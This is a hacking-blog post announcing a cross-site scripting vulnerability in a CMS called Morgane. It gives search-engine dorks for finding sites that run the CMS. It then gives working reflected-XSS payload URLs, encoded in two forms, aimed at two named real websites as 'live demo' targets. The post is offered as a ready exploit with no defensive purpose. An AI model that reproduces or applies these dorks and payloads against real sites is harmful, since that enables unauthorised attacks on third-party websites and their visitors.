• Home
  • Posts RSS
  • Comments RSS
  • E-Books
  • News
  • Pentesting
  • Scripts
  • Tutorials
  • Videos
  • Wallpapers

Morgane CMS - XSS Vulnerability

by Malik korrich ~ jeudi 3 juillet 2014 Libellés : CMS , hacker , HACKING , Morgane , newbie , NEXUS , vulnerability , Xss
Dorks:
intext:"www.morgane.co.uk" inurl:"/main.php?sid="
intext:"www.morgane.co.uk" inurl:"/main.php?id=" 

 Use string to char.. Or use numbers..

Example & Live Demo:

String to char mode:
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Numbers mode (testing mode):
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
 http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
* Can run XSS only on Firefox not Google Chrome :D



NEXUS 

0 commentaires :

Enregistrer un commentaire

Article plus récent » « Article plus ancien

ads

Category

  • Android
  • Antivirus
  • Apple Devices
  • E-Books
  • Facebook tips
  • Games
  • MOBILE HACKING
  • News
  • Pentesting
  • Scripts
  • Softwares
  • Spam
  • TIPS AND TRICKS
  • Tricks
  • Tutorials
  • Videos
  • WINDOWS 7
  • Wallpapers
  • Windows 8 tips
  • Windows XP

Follow us

Articles
Atom
Articles
Commentaires
Atom
Commentaires

Total Pageviews

Sparkline
Flag Counter
| Powered by BackTrack Team | All rights reserved |
top